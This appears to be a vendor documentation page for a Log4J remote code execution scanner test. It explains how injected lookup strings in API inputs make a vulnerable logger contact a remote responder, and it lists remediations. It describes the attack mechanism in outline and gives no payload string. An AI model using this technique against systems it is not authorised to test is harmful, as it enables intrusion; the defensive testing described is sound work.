Web A6 - Log4J Remote Code Execution
What is it?
This vulnerability arises due to high level reasons listed here.
Log4J is a widely used java based logging library. It has a known vulnerability that allows an attacker to download malicious code into the Log4J component, which leads to remote code execution.
The exact steps of this attack is described in the diagram above.
References
CWE-117: Improper Output Neutralization for Logs
Test case FAQs
When is this test case applicable?
Applies to all API endpoints that consume user supplied input.
How does it work?
The input parameter(s) within the API endpoint, are injected with malicious strings (Log4J injection strings. See diagram above).
This malicious string refers to a remote server controlled by Levo. This remote server is called the remote responder
.
If this malicious string is logged via a vulnerable Log4J library, the library is tricked into contacting the remote responder controlled by Levo.
Levo's remote responder provides confirmation that the attack launched by the test case was successful.
What is the solution?
Upgrade Log4j2 to version 2.15.0 or newer.
In previous releases (>2.10) this behavior can be mitigated by setting the system property "log4j2.formatMsgNoLookups" to "true", or by removing the JndiLookup class from the classpath (example: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class).
Whitelist outbound traffic from your services to only legitimate destinations (URLs).